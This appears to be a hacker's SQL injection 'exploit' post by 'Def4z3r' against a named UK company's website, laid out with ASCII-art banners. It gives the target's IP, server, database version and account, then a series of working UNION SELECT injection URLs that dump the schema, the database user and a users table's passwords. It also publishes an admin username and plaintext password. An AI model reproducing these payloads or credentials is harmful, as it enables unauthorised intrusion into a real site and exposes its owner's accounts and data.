www.wrekin-shell-mouldings.co.uk

1. ____ __ _ _ _____
2. | _ \ ___ / _| | || | ____ |___ / _ __
3. | | | | / _ \ | |_ | || |_ |_ / |_ \ | '__|
4. | |_| | | __/ | _| |__ _| / / ___) | | |
5. |____/ \___| |_| |_| /___| |____/ |_|
6. _---------------------------------------------------------------_
7. ---------------------------------------------------------------
8.  
9. # Exploit Title:www.wrekin-shell-mouldings.co.uk
10. # Google Dork: CO.UK FUCKED !
11. # Date: I WILL EXPLAIN LATER
12. # Author: Def4z3r
13. # Vulnerable Link 1 : http://www.wrekin-shell-mouldings.co.uk/certification.php?id='5
14. # Version: NEW GENERATION BOYZ 2012
15. # Tested on: HACKERS TRACK
16. # CVE : NO EXISTS
17.  
18. _ _ _ _ _ _
19. / \ | |__ ___ _ _| |_ | | | | ___ ___| |_
20. / _ \ | '_ \ / _ \| | | | __| | |_| |/ _ \/ __| __|
21. / ___ \| |_) | (_) | |_| | |_ | _ | (_) \__ \ |_
22. /_/ \_\_.__/ \___/ \__,_|\__| |_| |_|\___/|___/\__|
23. -------------------------------------------------------------
24.  
25. # Trget : http://www.wrekin-shell-mouldings.co.uk/certification.php?id=5
26. # Host IP : 212.100.249.99
27. # Web Server : Apache/2.0.52 (Red Hat)
28. # Powered-by : PHP/4.3.9
29. # Injection type : Integer
30. # Version : MySQL v 4.1.22-log
31. # User : wsmuser@localhost
32. # Database : wsmdb
33.  
34.  
35. _____ _ _ _ _ ____ _
36. |_ _|_ _| |__ | | ___ | \ | | __ _ _ __ ___ ___ / ___|___ | |_ _ _ __ ___ _ __ ___
37. | |/ _` | '_ \| |/ _ \ | \| |/ _` | '_ ` _ \ / _ \ | | / _ \| | | | | '_ ` _ \| '_ \/ __|
38. | | (_| | |_) | | __/ | |\ | (_| | | | | | | __/ | |___ (_) | | |_| | | | | | | | | \__ \
39. |_|\__,_|_.__/|_|\___| |_| \_|\__,_|_| |_| |_|\___| \____\___/|_|\__,_|_| |_| |_|_| |_|___/
40. -----------------------------------------------------------------------------------------------------
41.  
42. # Vulnerable Selected Column Count is 17
43. # Vulnerable Valid String Column is 3
44. # Target Vulnerable :D
45.  
46. _ _ _ _ _ _
47. / \ __| |_ __ ___ (_)_ __ (_)___| |_ _ __ __ _| |_ ___ _ __
48. / _ \ / _` | '_ ` _ \| | '_ \| / __| __| '__/ _` | __/ _ \| '__|
49. / ___ \ (_| | | | | | | | | | | \__ \ |_| | | (_| | |_ (_) | |
50. /_/ \_\__,_|_| |_| |_|_|_| |_|_|___/\__|_| \__,_|\__\___/|_|
51. ------------------------------------------------------------------------
52.  
53. user name : admin
54. user id : 30
55. password : bn1gf5dd
56.  
57.  
58. ____ _
59. | _ \ __ _| |_ __ _ ____
60. | | | |/ _` | __/ _` |_ /
61. | |_| | (_| | |_ (_| |/ /
62. |____/ \__,_|\__\__,_/___|
63. ------------------------------------------
64.  
65. # http://www.wrekin-shell-mouldings.co.uk/certification.php?id=-5 union all select 1,2,schema_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.schemata--
66.  
67. # http://www.wrekin-shell-mouldings.co.uk/certification.php?id=-5 union all select 1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
68.  
69. # http://www.wrekin-shell-mouldings.co.uk/certification.php?id=-5 union all select 1,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
70.  
71. # http://www.wrekin-shell-mouldings.co.uk/certification.php?id=-5 union all select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
72.  
73. # http://www.wrekin-shell-mouldings.co.uk/certification.php?id=-5 union all select 1,2,concat(version(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17--
74.  
75. # http://www.wrekin-shell-mouldings.co.uk/certification.php?id=5 and 1=0 union select 1,2,concat(user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 FROM users --
76.  
77.  
78. ___ ____ _ _
79. / _ \ / ___| ___ ___ _ _ _ __(_) |_ _ _
80. | | | | \___ \ / _ \/ __| | | | '__| | __| | | |
81. | |_| | ___) | __/ (__| |_| | | | | |_| |_| |
82. \___/ |____/ \___|\___|\__,_|_| |_|\__|\__, |
83. |___/
84. ------------------------------------------------------